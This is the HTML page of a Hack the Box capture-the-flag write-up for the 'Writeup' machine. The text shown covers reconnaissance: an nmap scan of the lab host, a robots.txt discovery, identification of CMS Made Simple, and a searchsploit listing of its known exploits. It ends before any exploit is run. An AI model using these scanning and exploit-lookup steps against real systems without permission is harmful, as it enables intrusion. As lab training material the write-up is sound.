<!DOCTYPE html>





<html lang="en" 
  
    mode="dark"
  
 >

  <!--
  The Head
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="theme" content="Chirpy v2.5.1">

  <title>Hack the Box - Writeup | Quantumly Confused
  </title>

  <meta name="description" content="HTB Writeup machine walkthrough. A relatively easy with an 'out-of-the-box' CMS exploit for User priviledges and an interesting login behavior abuse to pivot to root from there.">
  <meta name="keywords" content="hackthebox,htb,pentest,redteam,writeup,cms,exploit">
  <link rel="canonical" href="https://blog.quantumlyconfused.com/hack-the-box/2019/10/12/htb-machine-writeup/" />

  <meta name="twitter:title" content="HacktheBox Writeup - Writeup - QuantumlyConfused">
  <meta name="twitter:description" content="HTB Writeup machine walkthrough. A relatively easy with an 'out-of-the-box' CMS exploit for User priviledges and an interesting login behavior...">
  <meta name="twitter:image" content="https://blog.quantumlyconfused.com/assets/htb-writeup/infocard.PNG">
  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:site" content="@_PatrickDowning" />
  <meta name="twitter:creator" content="@_PatrickDowning" />

  <meta property="og:title" content="HacktheBox Writeup - Writeup - QuantumlyConfused">
  <meta property="og:description" content="HTB Writeup machine walkthrough. A relatively easy with an 'out-of-the-box' CMS exploit for User priviledges and an interesting login behavior...">
  <meta property="og:image" content="https://blog.quantumlyconfused.com/assets/htb-writeup/infocard.PNG">
  <meta property="og:url" content="https://blog.quantumlyconfused.com/hack-the-box/2019/10/12/htb-machine-writeup/">

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://www.favicon-generator.org/
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2019 Cotes Chung
  Published under the MIT license
-->



<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon">
<link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon">

<link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png">
<link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png">
<link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png">

<link rel="icon" type="image/png" sizes="192x192"  href="/assets/img/favicons/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

<link rel="manifest" href="/assets/img/favicons/manifest.json">
<meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'>
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">


  <!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
  <link rel="dns-prefetch" href="https://fonts.gstatic.com">

  <!-- GA -->
    <link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials">
    <link rel="dns-prefetch" href="https://www.google-analytics.com">

    <link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous">
    <link rel="dns-prefetch" href="https://www.googletagmanager.com">

    

    <!-- Global site tag (gtag.js) - Google Analytics-->

<meta name="google-site-verification" content="4x5Z0Ong7lBlu0f5GVm2D_Fma9DU4A_GvFaBJA5lOOo" />
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-148947358-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  
  gtag('js', new Date());
  gtag('config', 'UA-148947358-1');
</script>



  <!-- jsDelivr CDN -->
  <link rel="preconnect" href="cdn.jsdelivr.net">
  <link rel="dns-prefetch" href="cdn.jsdelivr.net">

  <!-- Bootstrap -->
  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"
    integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous">

  <!-- Font Awesome -->
  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"
    integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ="
    crossorigin="anonymous">

  <!--
  CSS selector for site.
  Chirpy v2.3
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT Licensed
-->



  <link rel="preload" as="style" href="/assets/css/post.css">
  <link rel="stylesheet" href="/assets/css/post.css">

  

    <link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css">
    <link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" />

  




  <!-- JavaScripts -->

  <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>

  <script async
    src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script>

  <!--
  JS selector for site.
  Chirpy v2.3
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT Licensed
-->



  <script async src="/assets/js/post.min.js"></script>

  





  <!-- PWA -->
  <script defer src="/app.js"></script>



  <script data-ad-client="ca-pub-1349331648978464" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

  <!-- Cookie Consent by https://www.PrivacyPolicies.com -->
  <script type="text/javascript" src="//www.privacypolicies.com/public/cookie-consent/4.0.0/cookie-consent.js"></script>
  <script type="text/javascript">
  document.addEventListener('DOMContentLoaded', function () {
  cookieconsent.run({"notice_banner_type":"headline","consent_type":"express","palette":"dark","language":"en","website_name":"https://blog.quantumlyconfused.com","website_privacy_policy_url":"https://blog.quantumlyconfused.com/tabs/disclaimer/"});
  });
  </script>
  <noscript><a href="https://www.PrivacyPolicies.com/cookie-consent/">Cookie Consent by PrivacyPolicies.com</a></noscript>

</head>


  <body data-spy="scroll" data-target="#toc">

    <div id="sidebar" class="d-flex flex-column">
      <!--
  The Side Bar
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<div id="nav-wrapper">
  <div id="profile-wrapper" class="d-flex flex-column">
    <div id="avatar" class="d-flex justify-content-center">
      <a href="/" alt="avatar">
        
        
        
        <img src="/assets/img/sample/padraignix.png" alt="avatar" onerror="this.style.display='none'">
      </a>
    </div>

    <div class="profile-text mt-3">
      <div class="site-title">
        <a href="/">Quantumly Confused</a>
      </div>
      <div class="site-subtitle font-italic">Quantum, InfoSec, Crypto, CTFs, and related adventures</div>
    </div>
  </div>

  <ul class="nav flex-column">
  

  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/projects/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-puzzle-piece ml-xl-3 mr-xl-3 unloaded"></i>
        <span>PROJECTS</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i>
        <span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i>
        <span>TAGS</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i>
        <span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i>
        <span>ABOUT</span>
      </a>
    </li> <!-- .nav-item -->
  

  </ul> <!-- ul.nav.flex-column -->

</div><!-- #nav-wrapper -->

<div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4">

  

  
    

    
    <a href="https://twitter.com/_PatrickDowning" aria-label="twitter" target="_blank" rel="noopener">
      <i class="fab fa-twitter"></i>
    </a>
    
  
    

    
    <a href="https://www.linkedin.com/in/downingpatrick/" aria-label="linkedin" target="_blank" rel="noopener">
      <i class="fab fa-linkedin"></i>
    </a>
    
  
    

    
    <a href="https://www.reddit.com/user/Padraignix" aria-label="reddit" target="_blank" rel="noopener">
      <i class="fab fa-reddit-alien"></i>
    </a>
    
  
    

    
    <a href="https://github.com/padraignix" aria-label="github" target="_blank" rel="noopener">
      <i class="fab fa-github-alt"></i>
    </a>
    
  
    

    
    <a href="https://www.twitch.tv/padraignix" aria-label="hackthebox" target="_blank" rel="noopener">
      <i class="fab fa-twitch"></i>
    </a>
    
  
    

    
    <a href="/feed.xml" aria-label="rss" >
      <i class="fas fa-rss"></i>
    </a>
    
  

</div>

    </div>

    <!--
  The Top Bar
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->
<div id="topbar-wrapper" class="row justify-content-center topbar-down">
  <div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between">
    <span id="breadcrumb">
      
        
        <span>
          <a href="/">
            Posts
          </a>
        </span>
        
      

      
        <span>Hack the Box - Writeup</span>
      

    </span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">
    Post
    </div>

    <i id="search-trigger" ></i>
    <!--<span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" placeholder="Search...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>
    </span>-->
    <span id="search-cancel" >Cancel</span>
    <!--<i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" autocomplete="off" placeholder="...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>-->
    </span>
    <span id="search-cancel" ></span>
  </div>

</div>


    <div id="main-wrapper">
      <div id="main">

        <!--
  Refactor the HTML structure.
-->



<!--
  Suroundding the markdown table with '<div class="table-wrapper">. and '</div>'
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->


<div class="row">

  <div id="post-wrapper" class="col-12 col-lg-11 col-xl-8">

    <div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">

      <h1 data-toc-skip>Hack the Box - Writeup</h1>

      <div class="post-meta text-muted d-flex flex-column">
        <!-- Published date and author -->
        <div>
          Posted
          <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago "
  
    data-toggle="tooltip"
    data-placement="bottom"
    title="Sat, Oct 12, 2019, 11:00 AM -0400"
  >

  
  

  
    Oct 12, 2019
  

  <i class="unloaded">2019-10-12T11:00:00-04:00</i>

</span>
          by
          <span class="author">
          
            Patrick Downing
          
          </span>
        </div>

        <!-- lastmod -->
          
          
        
          
          
            
            

        
        <div>
          Updated
          <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago lastmod"
  
    data-toggle="tooltip"
    data-placement="bottom"
    title="Sat, Nov 14, 2020,  4:36 PM -0500"
  >

  
  

  
    Nov 14, 2020
  

  <i class="unloaded">2020-11-14T16:36:16-05:00</i>

</span>
        </div>
        

        <!-- page views -->
        

      </div> <!-- .post-meta -->

      <div class="post-content">

        

        <!-- Using lozad. See: <https://github.com/ApoorvSaxena/lozad.js#usage> -->
        
          
          <h1>Introduction</h1>
<p>
<img width="75%" height="75%" src="/assets/htb-writeup/infocard.PNG" />
</p>

<p>Overall a nice simple box from HTB. The machine was relatively easy with an out-of-the-box CMS exploit for user and an interesting login behavior abuse to pivot to root. I'll cover both the proper exploits but also a few of my /facepalm moments throughout the experience.</p>

<h1>Initial Recon</h1>

<p>The machine's IP was 10.10.10.138. Let's start off with an <code>nmap</code> enumaration and see what we can find</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">nmap <span class="nt">-sS</span> <span class="nt">-Pn</span> <span class="nt">-p1-</span> <span class="nt">-sV</span> <span class="nt">-sC</span> <span class="nt">--open</span> <span class="nt">-v</span> 10.10.10.138
...
Nmap scan report <span class="k">for </span>10.10.10.138
Host is up <span class="o">(</span>0.018s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 65533 filtered ports
Some closed ports may be reported as filtered due to <span class="nt">--defeat-rst-ratelimit</span>
PORT   STATE SERVICE    VERSION
22/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u6 <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 <span class="nb">dd</span>:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 <span class="o">(</span>RSA<span class="o">)</span>
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  tcpwrapped
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel</code></pre></figure>

<p>Alright, SSH and potential web-service. Let's pop over to the browser and see what we can find</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-writeup/mainscreen.PNG" />
</p>

<p>Nothing too useful. Let's open up burpsuite and see if we can find anything else of use through here. We do a quick spider and end up with the following.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-writeup/burpsuite.PNG" />
</p>

<p>That's a bit better! We even see index.php that accepts a page parameter. This is starting to look promising. Wait, we didn't see anything of that useful on the main page, how did our spider result get /writeup? Oh there we go, look at robots.txt:<p>


<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="c1">#              __
#      _(\    |@@|
#     (__/\__ \--/ __
#        \___|----|  |   __
#            \ }{ /\ )_ / _\
#            /\__/\ \__O (__
#           (--/\--)    \__/
#           _)(  )(_
#          `---''---`
# Disallow access to the blog until content is finished.
</span><span class="n">User</span><span class="o">-</span><span class="n">agent</span><span class="p">:</span> <span class="o">*</span> 
<span class="n">Disallow</span><span class="p">:</span> <span class="o">/</span><span class="n">writeup</span><span class="o">/</span></code></pre></figure>


<h1>User exploitation</h1>

<p>Lesson learned regarding checking everything - always check robots.txt for any leftover crumbs. Let's not make that same mistake twice and go through the source code of the newly discovered writeup/index.php page and see what we can come up with.</p>


<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="o">&lt;</span><span class="n">base</span> <span class="n">href</span><span class="o">=</span><span class="s">"http://10.10.10.138/writeup/"</span> <span class="o">/&gt;</span>
<span class="o">&lt;</span><span class="n">meta</span> <span class="n">name</span><span class="o">=</span><span class="s">"Generator"</span> <span class="n">content</span><span class="o">=</span><span class="s">"CMS Made Simple - Copyright (C) 2004-2019. All rights reserved."</span> <span class="o">/&gt;</span>
<span class="o">&lt;</span><span class="n">meta</span> <span class="n">http</span><span class="o">-</span><span class="n">equiv</span><span class="o">=</span><span class="s">"Content-Type"</span> <span class="n">content</span><span class="o">=</span><span class="s">"text/html; charset=utf-8"</span> <span class="o">/&gt;</span></code></pre></figure>


<p>This seems interesting. From previous experience we know there are a quite a few CMS related exploits. While we don't see the exact version used here we can initially assume that it is a version released sometime in 2019. Let's see what searchploit has for us.</p>


<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="err">$</span><span class="o">&gt;</span> <span class="n">searchsploit</span> <span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span>
<span class="o">------------------------------------------------------------------------------------------------------------------------------------------</span>
 <span class="n">Exploit</span> <span class="n">Title</span>                                                                                    <span class="o">|</span>  <span class="n">Path</span>
                                                                                                  <span class="o">|</span> <span class="p">(</span><span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">share</span><span class="o">/</span><span class="n">exploitdb</span><span class="o">/</span><span class="p">)</span>
<span class="o">------------------------------------------------------------------------------------------------------------------------------------------</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="p">(</span><span class="n">CMSMS</span><span class="p">)</span> <span class="n">Showtime2</span> <span class="o">-</span> <span class="n">File</span> <span class="n">Upload</span> <span class="n">RCE</span> <span class="p">(</span><span class="n">Metasploit</span><span class="p">)</span>                                  <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">remote</span><span class="o">/</span><span class="mf">46627.</span><span class="n">rb</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">0.10</span> <span class="o">-</span> <span class="s">'Lang.php'</span> <span class="n">Remote</span> <span class="n">File</span> <span class="n">Inclusion</span>                                           <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">26217.</span><span class="n">html</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">0.10</span> <span class="o">-</span> <span class="s">'index.php'</span> <span class="n">Cross</span><span class="o">-</span><span class="n">Site</span> <span class="n">Scripting</span>                                           <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">26298.</span><span class="n">txt</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">1.0</span><span class="p">.</span><span class="mi">2</span> <span class="o">-</span> <span class="s">'SearchInput'</span> <span class="n">Cross</span><span class="o">-</span><span class="n">Site</span> <span class="n">Scripting</span>                                        <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">29272.</span><span class="n">txt</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">1.0</span><span class="p">.</span><span class="mi">5</span> <span class="o">-</span> <span class="s">'Stylesheet.php'</span> <span class="n">SQL</span> <span class="n">Injection</span>                                            <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">29941.</span><span class="n">txt</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">1.11</span><span class="p">.</span><span class="mi">10</span> <span class="o">-</span> <span class="n">Multiple</span> <span class="n">Cross</span><span class="o">-</span><span class="n">Site</span> <span class="n">Scripting</span> <span class="n">Vulnerabilities</span>                           <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">32668.</span><span class="n">txt</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">1.11</span><span class="p">.</span><span class="mi">9</span> <span class="o">-</span> <span class="n">Multiple</span> <span class="n">Vulnerabilities</span>                                                 <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">43889.</span><span class="n">txt</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">1.2</span> <span class="o">-</span> <span class="n">Remote</span> <span class="n">Code</span> <span class="n">Execution</span>                                                       <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">4442.</span><span class="n">txt</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">1.2</span><span class="p">.</span><span class="mi">2</span> <span class="n">Module</span> <span class="n">TinyMCE</span> <span class="o">-</span> <span class="n">SQL</span> <span class="n">Injection</span>                                              <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">4810.</span><span class="n">txt</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">1.2</span><span class="p">.</span><span class="mi">4</span> <span class="n">Module</span> <span class="n">FileManager</span> <span class="o">-</span> <span class="n">Arbitrary</span> <span class="n">File</span> <span class="n">Upload</span>                                  <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">5600.</span><span class="n">php</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">1.4</span><span class="p">.</span><span class="mi">1</span> <span class="o">-</span> <span class="n">Local</span> <span class="n">File</span> <span class="n">Inclusion</span>                                                      <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">7285.</span><span class="n">txt</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">1.6</span><span class="p">.</span><span class="mi">2</span> <span class="o">-</span> <span class="n">Local</span> <span class="n">File</span> <span class="n">Disclosure</span>                                                     <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">9407.</span><span class="n">txt</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">1.6</span><span class="p">.</span><span class="mi">6</span> <span class="o">-</span> <span class="n">Local</span> <span class="n">File</span> <span class="n">Inclusion</span> <span class="o">/</span> <span class="n">Cross</span><span class="o">-</span><span class="n">Site</span> <span class="n">Scripting</span>                               <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">33643.</span><span class="n">txt</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">1.6</span><span class="p">.</span><span class="mi">6</span> <span class="o">-</span> <span class="n">Multiple</span> <span class="n">Vulnerabilities</span>                                                  <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">11424.</span><span class="n">txt</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">1.7</span> <span class="o">-</span> <span class="n">Cross</span><span class="o">-</span><span class="n">Site</span> <span class="n">Request</span> <span class="n">Forgery</span>                                                  <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">12009.</span><span class="n">html</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">1.8</span> <span class="o">-</span> <span class="s">'default_cms_lang'</span> <span class="n">Local</span> <span class="n">File</span> <span class="n">Inclusion</span>                                     <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">34299.</span><span class="n">py</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">1.</span><span class="n">x</span> <span class="o">-</span> <span class="n">Cross</span><span class="o">-</span><span class="n">Site</span> <span class="n">Scripting</span> <span class="o">/</span> <span class="n">Cross</span><span class="o">-</span><span class="n">Site</span> <span class="n">Request</span> <span class="n">Forgery</span>                           <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">34068.</span><span class="n">html</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">2.1</span><span class="p">.</span><span class="mi">6</span> <span class="o">-</span> <span class="n">Multiple</span> <span class="n">Vulnerabilities</span>                                                  <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">41997.</span><span class="n">txt</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">2.1</span><span class="p">.</span><span class="mi">6</span> <span class="o">-</span> <span class="n">Remote</span> <span class="n">Code</span> <span class="n">Execution</span>                                                     <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">44192.</span><span class="n">txt</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">2.2</span><span class="p">.</span><span class="mi">5</span> <span class="o">-</span> <span class="p">(</span><span class="n">Authenticated</span><span class="p">)</span> <span class="n">Remote</span> <span class="n">Code</span> <span class="n">Execution</span>                                     <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">44976.</span><span class="n">py</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="mf">2.2</span><span class="p">.</span><span class="mi">7</span> <span class="o">-</span> <span class="p">(</span><span class="n">Authenticated</span><span class="p">)</span> <span class="n">Remote</span> <span class="n">Code</span> <span class="n">Execution</span>                                     <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">45793.</span><span class="n">py</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="o">&lt;</span> <span class="mf">1.12</span><span class="p">.</span><span class="mi">1</span> <span class="o">/</span> <span class="o">&lt;</span> <span class="mf">2.1</span><span class="p">.</span><span class="mi">3</span> <span class="o">-</span> <span class="n">Web</span> <span class="n">Server</span> <span class="n">Cache</span> <span class="n">Poisoning</span>                                   <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">39760.</span><span class="n">txt</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="o">&lt;</span> <span class="mf">2.2</span><span class="p">.</span><span class="mi">10</span> <span class="o">-</span> <span class="n">SQL</span> <span class="n">Injection</span>                                                          <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">46635.</span><span class="n">py</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="n">Module</span> <span class="n">Antz</span> <span class="n">Toolkit</span> <span class="mf">1.02</span> <span class="o">-</span> <span class="n">Arbitrary</span> <span class="n">File</span> <span class="n">Upload</span>                                  <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">34300.</span><span class="n">py</span>
<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="n">Module</span> <span class="n">Download</span> <span class="n">Manager</span> <span class="mf">1.4</span><span class="p">.</span><span class="mi">1</span> <span class="o">-</span> <span class="n">Arbitrary</span> <span class="n">File</span> <span class="n">Upload</span>                             <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">34298.</span><span class="n">py</span>
